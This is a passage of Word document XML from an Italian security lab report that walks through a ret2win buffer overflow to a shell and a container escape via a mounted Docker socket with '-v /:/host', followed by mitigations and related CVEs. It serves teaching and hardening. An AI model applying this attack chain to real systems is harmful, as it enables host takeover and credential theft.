      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, non protetto da </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>namespace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E85702E" w14:textId="1CF0A3B7" w:rsidR="00E4632A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>9.2 Vulnerabilit</w:t>
      </w:r>
      <w:r w:rsidR="00DE106B">
        <w:t>à</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> e </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>misconfigurazione</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="102D8C4D" w14:textId="257CF01C" w:rsidR="00E4632A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Stack buffer overflow (CWE-121, CWE-787): la funzione vulnerabile legge 256 byte in un buffer di 64. Sovrascrivendo l'indirizzo di ritorno con quello di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>win</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">), che chiama system("/bin/sh"), si ottiene una shell nel container. Il binario </w:t>
      </w:r>
      <w:r w:rsidR="00105CE3">
        <w:t xml:space="preserve">è </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">compilato senza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canary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> e senza PIE, con indirizzo di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>win</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">) fisso. Il payload include un gadget </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ret</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> per allineare lo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a 16 byte, richiesto dalle istruzioni SSE di </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>system(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Misconfigurazione</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: il file </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>docker-compose.yml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> monta /var/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>run</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>docker.sock</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> nel container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6C158D" w14:textId="58FD90DF" w:rsidR="00E4632A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9.3 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Perch</w:t>
      </w:r>
      <w:r w:rsidR="00105CE3">
        <w:t>è</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> la configurazione viola il confine di isolamento</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5383A92C" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il buffer overflow, da solo, mantiene l'attaccante confinato nel container. Il montaggio del </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>socket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> introduce nell'ambiente isolato un canale diretto verso il </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>daemon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, che gira come root </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sull'host</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. Dalla shell l'attaccante usa l'API del </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>daemon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> per creare un container che monta </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>la root</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dell'host</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (-v /:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>host</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">), ottenendo lettura e scrittura su qualsiasi file </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dell'host</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. L'isolamento non viene aggirato ma reso irrilevante dalla configurazione.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFDECD9" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>9.4 Assunzioni e prerequisiti</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3474484E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Binario compilato senza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canary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> e senza PIE; architettura x86-64; offset 72 = 64 buffer + 8 RBP salvato.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C069B65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Socket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Docker montato nel container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54846155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Processo nel container in grado di scrivere sul </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>socket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (shell come root).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7596EC97" w14:textId="5B270B73" w:rsidR="00E4632A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>Daemon Docker in modalit</w:t>
      </w:r>
      <w:r w:rsidR="00DE106B">
        <w:t>à</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> root (non </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rootless</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>); assenza di controlli sull'API.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FF6095" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>9.5 Sequenza di sfruttamento</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1528F432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Determinazione dell'indirizzo di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>win</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">) con nm e di un gadget </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ret</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>objdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2CE141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Payload: 72 byte di riempimento + gadget </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ret</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> + indirizzo di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>win</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>), riempito a 256 byte.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CA5234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Redirezione</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> del flusso a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>win</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>), che avvia /bin/sh; i comandi successivi vengono eseguiti dalla shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C07BB2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Dalla shell, creazione via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>socket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> di un container con </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>la root</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dell'host</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> montata e lettura della flag </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>host</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E56173B" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>9.6 Impatto di sicurezza</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C61BC8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Lettura di qualsiasi file </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dell'host</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (credenziali, chiavi private).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1624B07C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Scrittura </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sull'host</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (backdoor, persistenza, modifica di binari).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18933CF2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Compromissione di tutti gli altri container gestiti dal </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>daemon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6395D6B8" w14:textId="13DA3DAF" w:rsidR="00E4632A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>Escalation da una singola vulnerabilit</w:t>
      </w:r>
      <w:r w:rsidR="00DE106B">
        <w:t>à</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> applicativa al controllo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dell'host</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065B43A3" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9.7 Mitigazioni e </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hardening</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="763E822D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Non montare il </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>socket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Docker nei container; in alternativa proxy API con permessi minimi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571500DE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Docker </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rootless</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCF1CB0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 xml:space="preserve">Correzione del buffer overflow: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00105CE3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>read(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00105CE3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">0, buffer, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00105CE3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sizeof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00105CE3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(buffer) - 1); </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00105CE3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>compilazione</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00105CE3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> con stack canary, PIE, NX, -D_FORTIFY_SOURCE=2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338C7630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 xml:space="preserve">Least privilege </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00105CE3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00105CE3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> container: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00105CE3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>utente</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00105CE3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> non root, --cap-drop=ALL, --read-only, --security-opt=no-new-privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9ED8A5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ASLR attivo, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>seccomp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AppArmor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, user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remapping</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, scanner di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>misconfigurazioni</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE9F72D" w14:textId="4FEC3E50" w:rsidR="00E4632A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>10. Uso di vulnerabilit</w:t>
      </w:r>
      <w:r w:rsidR="00DE106B">
        <w:t>à</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> note (CVE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8A3611" w14:textId="77777777" w:rsidR="00105CE3" w:rsidRPr="00105CE3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00105CE3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Escape: CVE-2019-5736, breakout del runtime </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00105CE3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>runc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00105CE3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. NVD: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00105CE3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https://nvd.nist.gov/vuln/detail/CVE-2019-5736 ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00105CE3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> advisory </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00105CE3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Openwall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00105CE3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: https://www.openwall.com/lists/oss-security/2019/02/11/2 .; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BC4CE5" w14:textId="679934C4" w:rsidR="00E4632A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>misconfigurazione</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> del </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>socket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> raggiunge lo stesso obiettivo (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>escape</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> container-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>host</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) in modo riproducibile e realistico, comune in pipeline CI/CD e container di monitoraggio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DEB4FA" w14:textId="0049157A" w:rsidR="00E4632A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Buffer overflow: classi CWE-121 e CWE-787. Istanze della stessa classe: CVE-2015-7547 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>glibc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getaddrinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, RCE remoto) e CVE-2021-3156 (sudo, escalation locale a root). Il laboratorio isola il meccanismo in forma minima e deterministica, senza dipendere da versioni vulnerabili di software reale.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D18EBF" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>11. Catena di attacco completa (bonus)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00"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E4632A" w14:paraId="66EF1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A3D6D"/>
          </w:tcPr>
          <w:p w14:paraId="065E0A82" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Tappa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1A3D6D"/>
          </w:tcPr>
          <w:p w14:paraId="60C5DDE3" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRDefault="00000000"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3800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1A3D6D"/>
          </w:tcPr>
          <w:p w14:paraId="21DE444E" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Confine varcato</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E4632A" w14:paraId="5481A4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EA12CD" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>1. Exploit applicazione</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17E02E99" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRPr="00105CE3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00105CE3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Buffer overflow ret2win verso system("/bin/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00105CE3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>sh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00105CE3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>")</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3800" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E685B42" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Confine applicativo: da input non fidato a esecuzione di codice</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E4632A" w14:paraId="25743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9F2488" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>2. Accesso al container</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5049323F" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRPr="00105CE3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00105CE3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Shell come root </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00105CE3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>nel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00105CE3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> container</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3800" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2319879C" w14:textId="6707E2C3" w:rsidR="00E4632A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Nessuno: l'attaccante </w:t>
            </w:r>
            <w:r w:rsidR="00105CE3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>è</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> confinato nel container</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E4632A" w14:paraId="62BB7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614C15B" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>3. Escape</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
          </w:tcPr>
